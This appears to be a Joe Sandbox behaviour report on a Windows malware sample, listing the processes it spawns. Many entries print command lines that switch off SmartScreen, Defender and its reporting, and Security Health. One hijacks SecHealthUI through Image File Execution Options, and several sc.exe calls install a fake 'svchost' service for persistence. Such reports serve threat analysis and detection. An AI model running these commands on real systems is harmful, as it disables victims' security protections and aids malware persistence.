MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6828, Parent PID: 6280

General

Target ID:	5
Start time:	16:44:27
Start date:	19/04/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe
Imagebase:	0x7ff7bb450000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6836, Parent PID: 6828

General

Target ID:	6
Start time:	16:44:27
Start date:	19/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6888, Parent PID: 6828

General

Target ID:	7
Start time:	16:44:28
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6912, Parent PID: 6828

General

Target ID:	8
Start time:	16:44:29
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6924, Parent PID: 6828

General

Target ID:	9
Start time:	16:44:29
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6940, Parent PID: 6828

General

Target ID:	10
Start time:	16:44:30
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6956, Parent PID: 6828

General

Target ID:	11
Start time:	16:44:30
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6972, Parent PID: 6828

General

Target ID:	12
Start time:	16:44:31
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 6988, Parent PID: 6828

General

Target ID:	13
Start time:	16:44:31
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 7000, Parent PID: 6828

General

Target ID:	14
Start time:	16:44:32
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 7020, Parent PID: 6828

General

Target ID:	15
Start time:	16:44:32
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 7036, Parent PID: 6828

General

Target ID:	16
Start time:	16:44:33
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 7052, Parent PID: 6828

General

Target ID:	17
Start time:	16:44:33
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 7064, Parent PID: 6828

General

Target ID:	18
Start time:	16:44:34
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 7104, Parent PID: 6828

General

Target ID:	20
Start time:	16:44:34
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: reg.exePID: 3032, Parent PID: 6828

General

Target ID:	21
Start time:	16:44:35
Start date:	19/04/2022
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\taskkill.exe" /f
Imagebase:	0x7ff6df780000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 3256, Parent PID: 564

General

Target ID:	22
Start time:	16:44:36
Start date:	19/04/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 2732, Parent PID: 564

General

Target ID:	23
Start time:	16:44:36
Start date:	19/04/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 1312, Parent PID: 564

General

Target ID:	24
Start time:	16:44:37
Start date:	19/04/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 3740, Parent PID: 564

General

Target ID:	25
Start time:	16:44:38
Start date:	19/04/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5208, Parent PID: 564

General

Target ID:	26
Start time:	16:44:38
Start date:	19/04/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: SgrmBroker.exePID: 1048, Parent PID: 564

General

Target ID:	27
Start time:	16:44:38
Start date:	19/04/2022
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff780e80000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4952, Parent PID: 564

General

Target ID:	28
Start time:	16:44:39
Start date:	19/04/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6440, Parent PID: 564

General

Target ID:	29
Start time:	16:44:39
Start date:	19/04/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k unistacksvcgroup
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WinPcap_4_1_3.exePID: 3836, Parent PID: 6280

General

Target ID:	30
Start time:	16:44:48
Start date:	19/04/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe"
Imagebase:	0x400000
File size:	915128 bytes
MD5 hash:	A11A2F0CFE6D0B4C50945989DB6360CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: vcredist_2010_x64.exePID: 3108, Parent PID: 6280

General

Target ID:	31
Start time:	16:44:49
Start date:	19/04/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe" /q /norestart
Imagebase:	0x1000000
File size:	5673816 bytes
MD5 hash:	CBE0B05C11D5D523C2AF997D737C137B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: vcredist_2013_x64.exePID: 6716, Parent PID: 6280

General

Target ID:	32
Start time:	16:44:50
Start date:	19/04/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart
Imagebase:	0x1280000
File size:	7195976 bytes
MD5 hash:	4CCF1937068BF8D0773341F86A448634
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 6736, Parent PID: 564

General

Target ID:	33
Start time:	16:44:51
Start date:	19/04/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 3568, Parent PID: 6280

General

Target ID:	34
Start time:	16:44:51
Start date:	19/04/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost
Imagebase:	0x7ff67f380000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: vcredist_2013_x64.exePID: 6384, Parent PID: 6716

General

Target ID:	35
Start time:	16:44:52
Start date:	19/04/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe" /q /norestart -burn.unelevated BurnPipe.{2D277E6C-5CDF-4BE9-BD86-D80206082B4F} {7764B93C-9D98-4483-A035-10A63673DA0D} 6716
Imagebase:	0x1280000
File size:	7195976 bytes
MD5 hash:	4CCF1937068BF8D0773341F86A448634
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 6400, Parent PID: 6280

General

Target ID:	36
Start time:	16:44:52
Start date:	19/04/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe" description svchost "? ???? ??? ?? ?? ???? ?? ?? ?? ??? ?? ???(VPN) ??? ?????. ? ???? ???? ??? ? ???? ????? ??? ?? ???? ???? ????.
Imagebase:	0x7ff67f380000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6568, Parent PID: 3568

General

Target ID:	37
Start time:	16:44:52
Start date:	19/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 6360, Parent PID: 6280

General

Target ID:	38
Start time:	16:44:53
Start date:	19/04/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\sc.exe" config svchost start= auto
Imagebase:	0x7ff67f380000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6356, Parent PID: 6400

General

Target ID:	39
Start time:	16:44:53
Start date:	19/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: sc.exePID: 6916, Parent PID: 6280

General

Target ID:	40
Start time:	16:44:54
Start date:	19/04/2022
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\sc.exe" start svchost
Imagebase:	0x7ff67f380000
File size:	69120 bytes
MD5 hash:	D79784553A9410D15E04766AAAB77CD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6912, Parent PID: 6360

General

Target ID:	41
Start time:	16:44:54
Start date:	19/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6956, Parent PID: 6916

General

Target ID:	42
Start time:	16:44:55
Start date:	19/04/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: RuntimeBroker.exePID: 7008, Parent PID: 564

General

Target ID:	43
Start time:	16:44:56
Start date:	19/04/2022
Path:	C:\Windows\SysWOW64\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\RuntimeBroker.exe
Imagebase:	0xf70000
File size:	23040 bytes
MD5 hash:	737DF71F01C8DE6613D9A5F1870A6CB2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 2064, Parent PID: 564

General

Target ID:	45
Start time:	16:45:06
Start date:	19/04/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7338d0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ywvz5i8kT9.exePID: 6280, Parent PID: 3196COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFF7F0328DA Relevance: .1, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.498200760.00007FFF7F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fff7f030000_ywvz5i8kT9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca664f1106ced5cdcd5acd5bc9d199a3c84bc400779d2b570176ac8bcff08955
Instruction ID: f781056ece3a2fbb7d26857919aff795c0989dc7fbcaa372aac22974a81fd46a
Opcode Fuzzy Hash: ca664f1106ced5cdcd5acd5bc9d199a3c84bc400779d2b570176ac8bcff08955
Instruction Fuzzy Hash: 7331F32161D7C90FD31F9A348825566BFA5EB87210B1A82FFD0D6CB6D3DD18A817C392

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFF7F0328A9 Relevance: .1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.498200760.00007FFF7F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fff7f030000_ywvz5i8kT9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8dd8e7f00f9eff057217b1518dc73932cf8cb1746c8bd472268af5ce674270d
Instruction ID: 1ba9f145d0826d0798e7be4685ed452411813872494f90e1514a348cae88c21c
Opcode Fuzzy Hash: e8dd8e7f00f9eff057217b1518dc73932cf8cb1746c8bd472268af5ce674270d
Instruction Fuzzy Hash: 8431262161D7C90FD31F96348C25562BFA5DB87224B1A82FFD4C6CB6E3D918A817C392

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFF7F032958 Relevance: .1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.498200760.00007FFF7F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fff7f030000_ywvz5i8kT9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b721d14e1f66d22ff4afe7a8d3592c30909b15946a3a700890f70a655e8544
Instruction ID: 82e0aec41514a3ae9da5e0bcb4ea69b3d5ad80fa6dbf112698b30df3023ee9f1
Opcode Fuzzy Hash: 96b721d14e1f66d22ff4afe7a8d3592c30909b15946a3a700890f70a655e8544
Instruction Fuzzy Hash: 5421D82161D3C90FD31F56348C25566BFA9DB8722470A82EFD4C6CA6D3DD1898178392

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFF7F0302B8 Relevance: .1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.498200760.00007FFF7F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fff7f030000_ywvz5i8kT9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb345ad7718d610ecb70924606ceef9d2585a92189c4c18a08d114acdd71a52
Instruction ID: 8427dde0b0341dc572457e6f218c1093481fb835e648eec24c7c522d84048fc5
Opcode Fuzzy Hash: adb345ad7718d610ecb70924606ceef9d2585a92189c4c18a08d114acdd71a52
Instruction Fuzzy Hash: C621D53271C60C1F932CDA2D984A476B3DAE787235B11823EE587C6796ED25A81342C4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFF7F03046A Relevance: 1.6, APIs: 1, Instructions: 143
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 00007FFF7F038051

Memory Dump Source

Source File: 00000000.00000002.498200760.00007FFF7F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fff7f030000_ywvz5i8kT9.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f8a67e5e3e06cd08e7d798d7699a4de63397bdcb10e62a39972c8661f1ea39b6
Instruction ID: e2578e8523b7aaf8d19d63e441e733a7e86ee94dfd909d2f018b1de20f964ce8
Opcode Fuzzy Hash: f8a67e5e3e06cd08e7d798d7699a4de63397bdcb10e62a39972c8661f1ea39b6
Instruction Fuzzy Hash: EF412A3191CA4D8FD718AB689C4A6F9BBE0FF56321F04026EE049C32D2CB647842C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFF7F03020A Relevance: 1.6, APIs: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 00007FFF7F0311C1

Memory Dump Source

Source File: 00000000.00000002.498200760.00007FFF7F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fff7f030000_ywvz5i8kT9.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7f0a18da5c6462d43f2431afde779775e42b372f0bef5c3216bb5492a942d3ef
Instruction ID: 18ae05e486d1b361aa4990731600e8c9eace213b88a43d37b54745da92cb1d5d
Opcode Fuzzy Hash: 7f0a18da5c6462d43f2431afde779775e42b372f0bef5c3216bb5492a942d3ef
Instruction Fuzzy Hash: 1031B63191CA1C8FDB18EF99D84A6F9B7E5FB69321F00422FE04AD3251DB7068468B91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFF7F03112A Relevance: 1.6, APIs: 1, Instructions: 110
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 00007FFF7F0311C1

Memory Dump Source

Source File: 00000000.00000002.498200760.00007FFF7F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fff7f030000_ywvz5i8kT9.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8504e43b416064e72c28575b9681e6f9daf3dec949b3fd4504300156d2f6823b
Instruction ID: e5d2a17948af0c2f4e44d0394078506c317758dea9a4b599ae6ec76351c25fba
Opcode Fuzzy Hash: 8504e43b416064e72c28575b9681e6f9daf3dec949b3fd4504300156d2f6823b
Instruction Fuzzy Hash: 2531B83191CA5C4FDB18EF5998456FDBBE1FBA5321F04422FD04AD3251DB706856CB81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFF7F03503F Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

VId7, xrefs: 00007FFF7F0350B3

Memory Dump Source

Source File: 00000000.00000002.498200760.00007FFF7F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7fff7f030000_ywvz5i8kT9.jbxd

Similarity

API ID:
String ID: VId7
API String ID: 0-155529857
Opcode ID: a5b78d1ccc62f4c2dfd50d747028cb41f7c47dcefb7956b5a3367ae022e4ca46
Instruction ID: 5c1c4c37ecadfeb89966928479a02688a8a700c6b3e02f99f8aefa8fe5e908c9
Opcode Fuzzy Hash: a5b78d1ccc62f4c2dfd50d747028cb41f7c47dcefb7956b5a3367ae022e4ca46
Instruction Fuzzy Hash: A9210A6214D3C51FE31E59749C9A472BFA8DB83220B0A42BFD9C3C65A3D805681783D2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vcredist_2010_x64.exePID: 3108, Parent PID: 6280COMMON

Execution Graph

Execution Coverage:	28.1%
Dynamic/Decrypted Code Coverage:	75.4%
Signature Coverage:	42.3%
Total number of Nodes:	698
Total number of Limit Nodes:	20

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01005899 Relevance: 96.7, APIs: 42, Strings: 13, Instructions: 429
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

